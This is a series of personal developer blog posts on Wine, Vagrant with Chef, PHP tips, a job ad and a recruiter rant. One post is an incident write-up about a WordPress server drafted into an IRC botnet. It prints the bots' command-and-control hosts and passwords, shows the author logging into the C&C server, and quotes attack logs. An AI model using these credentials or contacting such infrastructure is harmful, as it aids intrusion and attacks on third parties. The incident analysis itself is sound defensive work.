After a fresh install i couldn’t get WoW to work. I’m not that big on playing games lately. But this bugged me. Good thing we have the interwebs.

Starting the battle.net agent manually before firing up the WoW launcher solved the launcher crashing.

wine ~/.wine/drive_c/users/Public/Application\ Data/Battle.net/Agent/Agent.1267/Agent.exe –nohttpauth & wine ~/.wine/drive_c/Program\ Files\ (x86)/World\ of\ Warcraft/Launcher.exe &

And installing vcrun2008 with winetricks solved the problem with the updater hanging.

[1] http://appdb.winehq.org/objectManager.php?sClass=version&iId;=25610&iTestingId;=70352 [2] http://www.codeweavers.com/compatibility/browse/name/?forum=1;app_id=7714;mhl=130618;msg=130314

So there are plenty of posts about this out there already. And this is nothing new i guess. But i am going to post it anyway. This weekend i spend some time playing with vagrant. And every setup guide seemed to be missing some steps the make the whole process a bit of a hassle. So i compiled my own steps in the post below. The goal was to create a basic Debian box for my PHP development. From which i could serve my local development files.

So to start of we need some packages.

Virtualbox

To create the virtual development image

NFS packages

To make sharing files between host and guest easy as pie

Vagrant

To package the virtual image and manage newly created box

$ sudo apt-get install virtualbox vagrant nfs-common nfs-kernel-server

Now is a good moment to download any Linux distro you want. I chose Debian. As it´s the most common in my day to day work.

$ wget http://cdimage.debian.org/debian-cd/6.0.5/i386/iso-cd/debian-6.0.5-i386-netinst.iso

Now launch virtualbox and create a new virtual machine. Just do what you normally do when you create a VM. But make sure to choose VMDK `Virtual Machine Disk´ as the format. The rest should be ok. When the VM is created start it up and choose the freshly downloaded Linux ISO to start the installation.

I only installed the base system + the SSH server. And when that’s all done. And the VM is running. Login as root and install some packages vagrant needs.

$ apt-get install sudo ruby ruby-dev libopenssl-ruby rdoc ri irb build-essential ssl-cert curl rubygems puppet

I won’t be setting up a Chef server to manage the vagrant images. But i will be using Chef-Solo to manage installing packages. So let’s install Chef.

install chef

Setup the opscode package repositories for APT

$ echo “deb http://apt.opscode.com/ lsb_release -cs-0.10 main” | tee /etc/apt/sources.list.d/opscode.list $ gpg –keyserver keys.gnupg.net –recv-keys 83EF826A $ gpg –export packages@opscode.com | tee /etc/apt/trusted.gpg.d/opscode-keyring.gpg > /dev/null

And finally install the opscode keymanager and and of course Chef.

$ apt-get update $ apt-get install opscode-keyring $ apt-get install chef

The installer will ask for the chef URL. I used none because i will be using chef solo

Now we need to add a user for vagrant to connect with.

$ adduser vagrant passwrd : vagrant $ groupadd admin $ usermod -a -G admin vagrant

Make sure the admin users can sudo without a password.

$ visudo %admin ALL=(ALL) NOPASSWD: ALL

Disable DNS for the SSH server. This should be a performance gain.

$ vi /etc/etc/ssh/sshd_config UseDNS no

Change the MOTD to something nice

$ bash -c “echo ‘Sweeet! A Vagrant box cooked by Chef!!’ > /etc/motd” $ chmod 0777 /etc/motd

Switch to the vagrant user to setup the insecure vagrant public SSH key.

$ su vagrant mkdir -p ~/.ssh chmod 0700 ~/.ssh curl -o ~/.ssh/authorized_keys https://raw.github.com/mitchellh/vagrant/master/keys/vagrant.pub chmod 0600 ~/.ssh/authorized_keys

That’s it for the VM. Now it’s time for vagrant to do some magic. First we need to create a vagrant package from the newly created VM.

$ vagrant package –base devbox $ mv package.box devbox.box

Done! Let’s test it.

$ vagrant box add devbox devbox.box $ mkdir test && cd test $ vagrant init devbox $ vagrant up $ vagrant ssh

Voila ssh’d into the VM

$ exit $ vagrant halt $ vagrant destroy

So that’s all fine and dandy. But a base system with SSH is not that useful. So that’s where Chef comes in. Like i mentioned earlier i won’t be using a Chef-Server. I will be using Chef-Solo. And will be doing a very basic setup.

A Chef install script is called a cookbook. And they can be found all over the place. But the main repository is over here (find more here https://github.com/opscode/cookbooks). So in our vagrant folder we create a folder called cookbooks.

$ mkdir cookbooks $ cd cookbooks

And we install some basic cookbooks. Plus a very simple one i hacked together to install the latest dotdeb package repositories.

https://github.com/tlenss/misc/tree/master/chef/cookbooks/dotdeb

$ git clone https://github.com/opscode/cookbooks

This will be enough for now. And will allow for some basic PHP development. To enable these package we have to edit the Vagrantfile file.

$ vi Vagrantfile

Add these lines for apache forwarding and NFS sharing

config.vm.share_folder “www”, “/var/www”, “/dev/location”

uncomment the :hostonly line so we can acces apache from our local box. And setup a hosts file mapping

config.vm.network :hostonly, “192.168.164.123” $ sudo sed -i ‘$ a\ 192.168.164.123 dev.box’ /etc/hosts

Configure chef’s cookbook path and add some recipes from the cloned cookbooks.

config.vm.provision :chef_solo do |chef|

chef.json = {
    "mysql" => {
        "server_root_password" => "somepassword"
    "bind_address" => "127.0.0.1"
    }
}

chef.cookbooks_path = "cookbooks"
chef.add_recipe("dotdeb")
chef.add_recipe("dotdeb::php54")
chef.add_recipe("openssl")
chef.add_recipe("apache2")
chef.add_recipe("apache2::mod_php5")
chef.add_recipe("apache2::mod_rewrite")
chef.add_recipe("mysql")
chef.add_recipe("mysql::server")
chef.add_recipe("memcached")
chef.add_recipe("vim")
chef.add_recipe("php")
chef.add_recipe("php::module_curl")
chef.add_recipe("php::module_mysql")
chef.add_recipe("php::module_memcache")
chef.add_recipe("php::module_sqlite3")

end

Time to call vagrant again. And this time the startup takes a bit longer. All the selected packages get installed. And once that’s done. And a fresh development box is waiting.

$ vagrant up $ vagrant ssh

Let’s check PHP

$ php -v PHP 5.4.6-1~dotdeb.0 (cli) (built: Aug 19 2012 08:45:58) Copyright (c) 1997-2012 The PHP Group Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies

What about apache?

$ ps -aux | grep apache root 790 0.1 0.2 5352 2580 ? Ss 23:40 0:00 /usr/sbin/apache2 -k start www-data 793 0.0 0.1 5124 1764 ? S 23:40 0:00 /usr/sbin/apache2 -k start www-data 797 0.0 0.2 546408 2412 ? Sl 23:40 0:00 /usr/sbin/apache2 -k start www-data 798 0.0 0.2 546408 2404 ? Sl 23:40 0:00 /usr/sbin/apache2 -k start www-data 811 0.0 0.2 546408 2424 ? Sl 23:40 0:00 /usr/sbin/apache2 -k start

Nice! And Pointing the browser to http://localhost:8080 loads the NFS shared folder up through Apache. That’s it for now. Time to sleep…

Some sources i used: [1] http://vagrantup.com/v1/docs/base_boxes.html [2] https://github.com/yevgenko/cookbook-dotdeb [3] http://vagrantup.com/v1/docs/provisioners/chef_solo.html

I always loved writing CLI scripts. And in PHP this is no different. I write a lot of CLI importers, scrapers, reporters, etc. And sometimes i want a bit more funk in my output then the standard black and white. When output is important i will add some colors to make things more clear. And this is not hard at all.

First of it’s probably a good thing to gather some of the available colors. A good resource is available here. Some of the colors and their corresponding codes can be found below.

Black 0;30 Blue 0;34 Green 0;32 Cyan 0;36 Red 0;31 Purple 0;35 Brown 0;33 Light Gray 0;37 Dark Gray 1;30 Light Blue 1;34 Light Green 1;32 Light Cyan 1;36 Light Red 1;31 Light Purple 1;35 Yellow 1;33 White 1;37

So how do i output colors you ask? Well that’s just plain easy. It’s a bit like setting up colors in your linux PS1 env variable.

Display a line in red for instance can be simply done by ‘echoing’ from the script with some extra formatting for bash to pickup. I will try to explain everything in the line below a bit later.

echo "\033[31m some colored text \033[31m"; // red
echo "\033[37m some colored text \033[37m"; // green

So what’s going on here. First we use an escape character so we can actually define a output color. This is done with \033 (\e). Then we open the color statement with [31m. Red in this case. The “some colored text” will be the text outputted in a different color. And after that we have to close the color statement the same way.

Easy as cake… that’s all!

If you’re looking for a new challenging and exiting Senior Webdeveloper position. Don’t look any further. If you already think you have the job of your dreams. Think again!

abbywinters.com (NSFW) is one of the largest and most ethical, highly rated, well designed, and successful erotic websites in the world today. abbywinters.com is the WINNER of the AVN 2011 Awards for Best Membership site!

And we are looking to hire a new talented webdeveloper to expand our small team. What would you think about joining our small Agile team of highly qualified professionals?

You will be creating sexy, exiting and game changing experiences for the web, work for one of the industry leaders. And just be part of an awesome company. Some of the jobs key elements are:

• Implementing development projects

• Leading informal mentoring during day-to-day work

• Contribute to design of development projects

• Track, reduce, and prevent technical debt in Web Development projects

Motivated by principles of social responsibility, we deliver provocative media by embracing imagination, creativity and emerging technologies. Our models, customers and business partners are inspired by our fervid passion.

Our experienced staff use state-of-the-art content production facilities to produce 10 shoots a week from concept to finished art, utilizing the most advanced digital capture, post production and delivery systems in the world.

You will be working directly with our Web Dev Manager, Lead developer and colleagues in the web dev team. We need each individual to contribute for us to continue as a pioneer in our industry.

If you posses a “Can do” attitude. Would like to work in the center of Amsterdam. And are able to identify your self in the criteria below. You might want to head over to our career portal for a more detailed description.

Technical competencies – Required

• High level of skill with PHP 5

• High level of skill with Object Oriented Programming

• High level of skill with HTML/CSS

• High level of skill with JavaScript

• High level of skill with Internet Applications

• Moderate level of skill with Unit Testing and Test Driven Design

• Moderate level of skill with MySQL

• Moderate level of skill with Windows XP operating system

• Experience with the GNU/Linux operating system

• Competent with Revision Control systems (Subversion)

• Bachelor of Science in Computer Science, or equivalent experience

• Zend Certified Engineer, or equivalent experience

• At least 5 years experience in Web Application Development

Technical competencies – Desired

• Moderate level of skill with the Apache HTTP server

• Good understanding of the Model-View-Controller pattern

• Good understanding of the ActiveRecord Object-Relational-Mapping pattern

• Familiarity with Agile software development practices (Scrum)

• E-commerce

• Agile development experience

Normally when i write regular expressions with for instance PHP´s preg_match. I will use the standard $matches array to catch the result of pattern matches. This array has a normal numeric index for each match found. And looks something like

$matches = array();
preg_match("/^Get(.+)Repository$/", "GetFooBarRepository", $matches);
var_dump($matches);

array(2) { [0] => string(19) “GetFooBarRepository” [1] => string(6) “FooBar” }

And there is nothing wrong with that. Except for the fact that numeric indexes are not always easy to work with. And it does not look all that clean in the code itself. SO last week my LD pointed out the fact that the likes using name based indexes for the matched patterns. And this is pretty sweet. I have seen it before but never bothered to adopt it myself. And the result looks like

$matches = array();
preg_match("/^Get(?<repositoryname>.+)Repository$/", "GetFooBarRepository", $matches);
var_dump($matches);

array(3) { [0] => string(19) “GetFooBarRepository” ‘repositoryName’ => string(6) “FooBar” [1] => string(6) “FooBar” }

And i have to say. It looks a lot cleaner. So i added this to my bag of tricks. And will be using it from now on.

Last week i got this error while doing some coding with a new library. And at first i didn’t quite get what was causing this. The line in question looked like

$url = reset($file->getPaths());

So how can that throw an error like “Only variables should be passed by reference” you might ask? Well as it turns out to be. PHP functions don’t like arguments returned from another function. As with this case. The ->getPaths() method holds a reference to the returned array. Which it shouldn’t but that’s another thing.

So i guess from now i will doing the thing below. Or check for references beforehand!

$paths = $file->getPaths();
$url = reset($paths);

For the past few months i have been switching some projects over to git from Subversion. And have been trying to get the hang of all the command line options available. And i will be doing that for a while longer until i get completely comfortable. And for communication to the remote git server i have been using SSH key authentication. Which works smoothly just like it did with Subversion.

But i wanted to check out the GIT support available in Zend Studio 9. And hit a problem pretty quickly. But i will describe that below. First i will create a local clone of my git project.

$ git clone ssh://[somehost]/~/git/project.git

To test if everything is working i do a test commit. If that succeeds if push it out to the remote master.

$ cd project.git $ touch TEST $ git commit $ git push origin master

So that works fine. Now time to see how Zen Studio handles this. To create a project i use the Create from Git option. And select the local checkout i just created. This will read the whole repository configuration. And you are basically done from here. But as i mentioned earlier, i had some difficulties getting things running smoothly. I discovered that when it was time to push changes to the master repository.

When i used the Push to Upstream option. I was greeted by a login panel that seemed to have selected the correct SSH key and user to perform the login. But when i typed the password, it just kept asking for the password. Again and again. Hmm. That sucks! The password was correct. I tried with a newly created key. No luck either. The last thing i tried was updating to a nightly build of Egit found here. But this offered no solution either.

After reading a couple of complaints i found this bug report for the EGit eclipse plugin. The thread contains a solution for the login issue i was having. Gotta love Google!

Apparently the problem has to do with the encryption algorithm used to create the SSH keys. In this case the EGit plugin (which uses Jsch to do the SSH communication) was having problems with AES encrypted keys. And to solve the problem the Jsch library should be replaced with a newer version to make things work again.

So lets download this JSch library and update it manually. The library (JSch v 0.1.46) can be found here.

$ cd ZendStudio9 $ find . -name ’jsch’ -type f

Found it plugins/com.jcraft.jsch_0.1.41.v201101211617.jar. So let’s try to update that.

$ cp plugins/com.jcraft.jsch_0.1.41.v201101211617.jar plugins/com.jcraft.jsch_0.1.41.v201101211617.jar.backup $ wget http://sourceforge.net/projects/jsch/files/jsch.jar/0.1.46/jsch-0.1.46.jar/download $ mv jsch-0.1.46.jar plugins/com.jcraft.jsch_0.1.41.v201101211617.jar

After restarting ZS everything worked fine again. Another problem solved! Thanks to the guys who posted in the EGit bug thread. Some good community Karma here! Time for other things. Hope it helps!

While doing our routine sprint retrospective today. We got interrupted by our office manager Wendy. An important phone call for me. Hmm… Should have known.

I picked up the phone. And the guy (Amoria Bond) on the other end immediately started his sales pitch. O shit another one of those nasty recruiters. So after listening to him for a few seconds i quickly interrupted him. Told him i was not interested in a new job at all. And that he was a jerk and extremely unprofessional for calling me at the office. Completely unaware (or maybe intentionally?) what impact this might have if for instance my manager picks up the phone. Besides it’s just plain rude.

Now don’t get me wrong. It’s not a rant for nothing. I don’t hate recruiters. And have worked with some professional ones in the past. I’ve always enjoyed communicating with linda-lotte while she was still working for Recruit4it. And the guys at Starapple are OK as well. But this guy today really pissed me off with his aggressive unmannered approach. It’s a shame i didn’t catch his name while i was in rant mode. But please don’t ever call me again.

Update:

It seems to be some form of new tactic to call developers in the office where they work. This happened a couple of times more after this post. So this is for the next recruiter that calls me in the office. I’ll personally come over and kick your ass!!

Last week i got an email from the Dutch NCSC (Nationaal Cyber Security Centrum). Apparently one of the nodes i manage for a customer was part of a botnet. There were no further demands. They just informed me about the issue. Damn cool! Being part of a botnet however. Not so cool!

With the email came a small excerpt of a IRC channel log. I recognized the node. So SSH’ed into that specific node. And used netstat to check for any strange connections. A connection on port 20 to the C&C; node of the botnet. Thats not good.

$ netstat -an Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 xxx.xxx.xxx.xx:20 69.162.80.62:20 ESTABLISHED

In the email from NCSC it was mentioned to look for files called wp-rss3.php. But a search for this file did not return any hits. Hmmm. And i still had no idea which site it concerned. Since a couple were running on this particular node. The only thing certain. It’s Wordpress related. So i started searching for recent Wordpress compromises. And found a lot of hits on Google for the timThumb and wps3slider plugins. But checking the log files for these plugins revealed nothing. And for some weird reason i just cleaned up the log partition a couple of days before. So not much luck there.

Some more Googling told me to do a search on the Wordpress installs for the PHP function base64_decode(). O well. Lets give it a try. Some suspicious files did show up instantly.

$ find . -type f -exec grep -l ‘base64_decode’ {} \; ./uploads/2010/06/wp-rss4.php (source) ./uploads/2011/05/alienee.php (source) ./plugins/wps3slider/temp/34e3a3a74f6e2d0f236bdd3ba70c0c03.php (source) ./plugins/wps3slider/temp/cf2cdb3ad3249b9692de07290f16f287.php (encoded) (decoded) ./plugins/wps3slider/temp/771b821c974131c67e34c83d8d2db725.php (encoded) (decoded) ./plugins/wps3slider/temp/2b3753ea4769084f2e571737b695b03a.php (encoded) (decoded) ./plugins/wps3slider/temp/7228f168d9692eafeafc54dbc3a1ab49.php (encoded) (decoded) ./plugins/wps3slider/uploads/1.php (source) /var/tmp/dc.pl (encoded) (decoded)

Interesting. A quick look at the files showed that most of them were obfuscated. But not all. Two of the files were IRC bots written in PHP. At this moment i couldn’t resist but crack a little smile. But its also a reminder of how fragile the web really is. I quickly moved the files out of the way. And rebooted the machine. When it came back online i monitored all connections for a while. But the connection to the C&C; node was not restored. So i informed NCSC. And went back to bed!

The Wordpress admin should have kept the sites up to date. Lesson learned i hope! of course i could not resist to come back to it later. And so i did. I started by searching the Apache log files for wp-rss4.php. And found a couple of instances where this file was directly called. From a total of 4 different IP addresses.

69.162.80.62

This is the IP address of the C&C; server.

186.241.16.25 201.8.237.18 201.8.226.109

These IP addresses are all originating from Brasil. No further information is available at this moment. After that i started poking around the trojans / IRC bots found earlier. And as mentioned earlier. There were two bots installed on the server, One was running. The other wasn’t. This is configuration snippet from both bots.

The first bot. And the one i was informed about.

var $config = array("server"=>"antesedepois.servegame.com",^M
                     "port"=>20,^M
                     "pass"=>"depois",^M
                     "prefix"=>"depois",^M
                     "maxrand"=>8,^M
                     "chan"=>"#depoiswp",^M
                     "key"=>"",^M
                     "modes"=>"+iB-x",^M
                     "password"=>"depois",^M
                     "trigger"=>".",^M
                     "hostauth"=>"*" // * for any hostname^M

And the second one

var $config = array("server"=>"58.225.75.155",
                     "port"=>9999,
                     "pass"=>"",
                     "prefix"=>"animal",
                     "maxrand"=>8,
                     "chan"=>"#animal",
                     "key"=>"",
                     "modes"=>"+iB-x",
                     "password"=>"oishi",
                     "trigger"=>".",
                     "hostauth"=>"*!*@The.Black.Cat" // * for any hostname
                     );

Notice the **^M** characters at the end. Seems like somebody is using windows. So now we have login details for two C&C; servers. Why not take a look.

$ ircii /server antesedepois.servegame.com:20

Some standard IRC stuff

Connecting to port 20 of server antesedepois.servegame.com Welcome to the Internet Relay Chat Network, root (from IRCPRIVATE) /etc/irc/script/local V0.5 for Debian finished. Welcome to ircII. If you have not already done so, please read the new user information with /HELP NEWUSER Your host is IRCPRIVATE, running version 1.2.1546 This server was created jan 27 2012 at 06: 29:02 HodB (Serial # 00-00-00) channel modes available abdefghijklmnopqrstuvwxyzACEFIKLMOPT IRCX There are 6 users and 362 invisible on 1 servers 7 channels have been formed This server has 368 clients and 0 servers connected Current local users: 368 Max: 989 Current global users: 368 Max: 989 MOTD Not Present

So let’s check the channels on this thing

/list

Channel Users Topic #depoiswp 360 Entrou = Ban :) #grmteam 6
#depoisSca 4 Entrou = Ban :) #depoisSca 4 Entrou = Ban :) #depoisVul 6 Entrou = Ban :) #rfi 3
#sql 1

I entered all of the channels and waited for a while. But no activity took place. The only really interested channel is #depoiswp. This is the channel where all the bots connect. At the time i logged in there were about 360 of them available. I immediately recognized the log excerpt send to me by the NCSC.

Topic for #depoiswp: Entrou = Ban :) #depoiswp SYSTEM 1327945185 (#depoiswp/#depoiswp) Entrou = Ban :) [A]depois88802849 (~depois48170648@68.233.238.XX) has joined channel #depoiswp #depoiswp 1327653297 [A]depois13436992 (~depois92951214@212.227.114.XX) has joined channel #depoiswp [A]depois18833547 (~depois69088341@184.154.130.XX) has joined channel #depoiswp [A]depois80116634 (~depois13242297@213.251.189.XXX) has joined channel #depoiswp [A]depois31855907 (~depois23946193@82.85.28.XXX) has joined channel #depoiswp [A]depois25458508 (~depois64120008@87.106.214.XX) has joined channel #depoiswp [A]depois17803105 (~depois55004207@74.208.16.XX) has joined channel #depoiswp [A]depois96800217 (~depois89042073@174.121.216.XXX) has joined channel #depoiswp [A]depois17108432 (~depois51961332@209.68.1.XXX) has joined channel #depoiswp [A]depois95432403 (~depois13925479@209.68.1.XXX) has joined channel #depoiswp [A]depois96515275 (~depois10767943@195.74.38.XXX) has joined channel #depoiswp [A]depois73596561 (~depois90562179@69.89.31.XXX) has joined channel #depoiswp [A]depois85357227 (~depois31697723@64.191.115.XX) has joined channel #depoiswp [A]depois07993697 (~depois40240585@79.96.128.XX) has joined channel #depoiswp [A]depois97441253 (~depois19633359@193.189.74.XX) has joined channel #depoiswp [A]depois76843389 (~depois55419325@176.9.34.XXX) has joined channel #depoiswp [I]depois16679788 (~depois28004829@213.171.218.XXX) has joined channel #depoiswp *** [A]depois88178285 (~depois05296405@74.220.215.XXX) has joined channel #depoiswp

<[A]depois16231776> [Attack Finalizado!]: 1749605 MB enviados / Pacotes enviados: 14580 MB/s <[I]depois60130568> [Attack Finalizado!]: 75 MB enviados / Pacotes enviados: 1 MB/s <[I]depois48664304> [Attack Finalizado!]: 75 MB enviados / Pacotes enviados: 1 MB/s <[I]depois65415449> [Attack Finalizado!]: 75 MB enviados / Pacotes enviados: 1 MB/s <[I]depois11325010> [Attack Finalizado!]: 75 MB enviados / Pacotes enviados: 1 MB/s [A]depois40994506 (~depois72760562@79.98.28.XX) has joined channel #depoiswp <[A]depois07568398> [Attack Finalizado!]: 2187317 MB enviados / Pacotes enviados: 18228 MB/s <[A]depois55402758> [Attack Finalizado!]: 11425 MB enviados / Pacotes enviados: 95 MB/s [A]depois03383512 (~depois52457929@74.220.215.XX) has joined channel #depoiswp <[A]depois37064023> [Attack Finalizado!]: 1264043 MB enviados / Pacotes enviados: 10534 MB/s <[A]depois69234369> [Attack Finalizado!]: 2205504 MB enviados / Pacotes enviados: 18379 MB/s [A]depois74911768 (~depois04730096@74.220.215.XX) has joined channel #depoiswp Signoff: [A]depois31575043 (Connection reset by peer) <[I]depois17710498> [Attack Finalizado!]: 81 MB enviados / Pacotes enviados: 1 MB/s <[I]depois28464134> [Attack Finalizado!]: 81 MB enviados / Pacotes enviados: 1 MB/s

Thats fine and all. I disconnected shortly after that. I really have no reason to be poking around there now do i ;) Besides who want to interfere with an ongoing investigation. So poking around the files a bit more didnot reveal all that information.Except for the fact that besides a IRC bot a backdoor was also installed in the form of a perl script dc.pl installed in /var/tmp. So who knows. The server might be rooted at this point.

I spend some more time on decoding the bot and trojan contents. And posted them on pastebin if you are interested. The server is going to be decommissioned soon. So i am not going to pay much more attention to it.

1.php and b2dabd0e2c42b55fabf741bcac29f857.php

Web Shell by boff

2b3753ea4769084f2e571737b695b03a.php

This file was base64 encoded but once decoded reveled to be a simple script by v0pCr3w and nob0dyCr3w to run system commands on the server. Also included was a simple upload form.

34e3a3a74f6e2d0f236bdd3ba70c0c03.php

c99 injector v1

771b821c974131c67e34c83d8d2db725.php

This script was rot13 and base64 encoded and was trying to cleanup after the hacker. And install a second back door.

7228f168d9692eafeafc54dbc3a1ab49.php and cce0a37ffc138a8908da05977639bed1.php

Again rot13 and base64 encoded.But this script contained something that looks like a control panel. The page title was ‘Hacked by Sherif #oishi @ ALLnet’

alienee.php

Still working on this one

cf2cdb3ad3249b9692de07290f16f287.php and ded3244749701c4eb5a29b959ad56736.php

These files contained a second bot that was connecting to a whole different server. Probably exploited by another crew?

dc.pl

This Perl backdoor was created by one of the IRC bot scripts. And was hiding in /var/tmp after creation.

And some links i found useful while working on this issue. http://eromang.zataz.com/2012/01/08/gangbang-mytijn-org-malware-spreader-down/ http://www.madirish.net/content/hookworm-stealth-php-backdoor http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/

Ok it’s a bit late But i have been laying under a rock for the last week. And i guess it can’t hurt!

Last week a critical bug was discovered in PHP. Which affects versions 5.3.9 and 5.2.17. The bug could be exploited to run arbitrary code on a remote PHP system. So upgrade your systems. And of course Stefan Esser popped up with some wise words :)… O well i still think the guy does great work.

More info about the issue can be found on packetstorm (CVE-2012-0830)